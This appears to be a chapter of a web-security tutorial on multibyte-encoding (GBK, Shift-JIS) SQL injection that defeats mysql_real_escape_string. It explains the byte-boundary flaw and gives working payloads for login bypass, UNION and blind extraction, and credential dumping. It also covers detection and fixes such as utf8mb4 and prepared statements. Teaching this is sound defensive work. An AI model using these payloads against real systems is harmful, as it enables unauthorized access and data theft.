Multibyte encoding bypass exploits character set handling differences to bypass SQL injection filters. This technique primarily affects legacy PHP applications using non-UTF-8 encodings like GBK (Chinese character set).
| Encoding Type | Examples | Character Size |
|---|---|---|
| Single-byte | ASCII, Latin1 (ISO-8859-1) | 1 byte per char |
| Multibyte | UTF-8, GBK, Big5 | 2-4 bytes per char |
UTF-8 (Variable length):
- ASCII chars: 1 byte (0x00-0x7F)
- Extended: 2-4 bytes
GBK (Chinese encoding):
- ASCII compatible: 1 byte (0x00-0x7F)
- Chinese chars: 2 bytes (0x81-0xFE + second byte)
When different components use different character sets:
| Component | Character Set | Action |
|---|---|---|
| Browser | UTF-8 | Sends request |
| Server | GBK | Processes input |
| Database | GBK | Executes query |
The Mismatch: Server interprets UTF-8 bytes as GBK, causing character boundary confusion.
Byte sequence: 0xBF 0x27
How it works:
| Context | Interpretation |
|---|---|
| GBK | Single multibyte character (legal) |
| Latin1 | ¿' (0xBF = ¿, 0x27 = ') |
| Step | Action | Result |
|---|---|---|
| 1 | Attacker sends 0xBF27 | Magic bytes injected |
| 2 | Server receives as GBK | Interprets as single character |
| 3 | mysql_real_escape_string() | Adds backslash: 0xBF5C27 |
| 4 | Database interprets 0xBF5C | As single GBK character |
| 5 | 0x27 becomes unescaped | Quote is now FREE |
| 6 | SQL injection | Payload executes successfully |
Normal Escaping (Safe):
Input: '
Escape: \
Result: \' ← Backslash escapes quote
Multibyte Bypass (Vulnerable):
Input: BF 27 (¿')
Escape: BF 5C 27 (¿\')
GBK: [BF5C] [27] ← BF5C is one char, 27 is unescaped '
Result: ¿\' ← Quote is FREE!
Payload:
# Python to generate payload
payload = b'\xbf\x27 OR 1=1-- 'Result:
SELECT * FROM users WHERE name = '¿\' OR 1=1-- '
-- Database sees: ... WHERE name = '[BF5C]' OR 1=1-- 'Payload:
%BF%27%20%4F%52%20%31%3D%31%2D%2D%20
Decodes to:
¿' OR 1=1--
Authentication Bypass:
# Username field
username = b'\xbf\x27 OR 1=1 LIMIT 1-- \x27'Query:
SELECT * FROM users WHERE username = '¿\' OR 1=1 LIMIT 1-- '' AND password = '...'Magic Bytes: Similar GBK technique
Payload:
payload = b'\xa1\x27 OR 1=1-- 'Vulnerable Sequences:
# 0x81-0x9F and 0xE0-0xFC are first bytes
payload = b'\x81\x27 OR 1=1-- 'Similar approach:
payload = b'\xa1\x27 OR 1=1-- 'Indicators:
- Legacy PHP applications
mysql_set_charset('gbk')in codeSET NAMES gbkin database- Chinese/Japanese/Korean language content
Code Patterns:
// Vulnerable pattern
mysql_query("SET NAMES gbk");
mysql_real_escape_string($input);Step 1: Check Character Set
-- Check database charset
SHOW VARIABLES LIKE 'character_set%';Step 2: Send Test Payload
%BF%27
Step 3: Observe Error Messages
| Response | Meaning |
|---|---|
MySQL error near ' |
Quote escaped properly (safe) |
| Syntax error at end | Quote consumed (vulnerable!) |
| No error | Check if injection succeeded |
Payload:
username = b'\xbf\x27 UNION SELECT 1,2,3-- 'Query:
SELECT * FROM users WHERE username = '[BF5C]' UNION SELECT 1,2,3-- ''True Condition:
username = b'\xbf\x27 AND 1=1-- 'False Condition:
username = b'\xbf\x27 AND 1=2-- 'MySQL:
username = b'\xbf\x27 AND SLEEP(5)-- 'PostgreSQL:
username = b'\xbf\x27 AND pg_sleep(5)-- 'Database:
-- Set UTF-8 for all connections
SET NAMES utf8mb4;
ALTER DATABASE mydb CHARACTER SET utf8mb4;Application (PHP):
// Use UTF-8
mysqli_set_charset($conn, "utf8mb4");
// Or PDO
$dsn = "mysql:host=localhost;dbname=mydb;charset=utf8mb4";PHP PDO (Safe regardless of charset):
$stmt = $pdo->prepare("SELECT * FROM users WHERE name = ?");
$stmt->execute([$username]); // Safe from multibyte bypassPHP MySQLi (Safe):
$stmt = $conn->prepare("SELECT * FROM users WHERE name = ?");
$stmt->bind_param("s", $username);
$stmt->execute();function validate_utf8($string) {
return mb_check_encoding($string, 'UTF-8');
}
if (!validate_utf8($user_input)) {
die("Invalid encoding");
}function sanitize_multibyte($input) {
// Remove dangerous GBK sequences
$dangerous = array("\xbf", "\xc0", "\xc1");
return str_replace($dangerous, "", $input);
}Vulnerable Code:
// Common in Chinese PHP CMS
mysql_query("SET NAMES gbk");
$username = mysql_real_escape_string($_GET['user']);
$query = "SELECT * FROM admin WHERE username = '$username'";Exploit:
GET /login.php?user=%BF%27%20OR%201=1--%20
Result: Authentication bypass
Vulnerable Code:
// Shift-JIS encoding
mb_convert_encoding($input, "SJIS", "auto");
$query = "SELECT * FROM products WHERE name LIKE '%$input%'";Exploit:
payload = b'\x81\x27%20UNION%20SELECT%20*%20FROM%20admin--%20'Setup:
- PHP application with
SET NAMES gbk - Login form with username/password
Task:
- Identify GBK encoding
- Send multibyte payload
- Bypass authentication
Payload:
Username: %BF%27 OR 1=1--
Password: anything
Setup:
- Search function using GBK
- Vulnerable to multibyte bypass
Task:
- Confirm multibyte injection
- Extract column count
- Dump admin credentials
Payload:
search = b'\xbf\x27 UNION SELECT username,password FROM admin-- 'Setup:
- Blind SQL injection via multibyte
- No error messages
Task:
- Use time-based detection
- Confirm injection with delays
- Extract data character by character
Payload:
# Test for 'a'
username = b'\xbf\x27 AND (SELECT SUBSTRING(password,1,1) FROM admin) = CHAR(97)-- '- Multibyte encodings can bypass escaping - Character set confusion
- GBK 0xBF27 is the classic bypass - Creates valid multibyte char
- UTF-8 is the defense - Consistent encoding prevents bypass
- Prepared statements always safe - Regardless of encoding
- Legacy PHP apps most at risk - Modern apps use UTF-8
This vulnerability primarily affects:
- PHP 5.x with
mysql_*functions - Applications using GBK/Big5/Shift-JIS
- Legacy systems not updated to UTF-8
Modern applications using UTF-8 consistently and prepared statements are not vulnerable to this specific attack vector.
Continue to 21 - NoSQL Injection to learn about non-relational database injection techniques.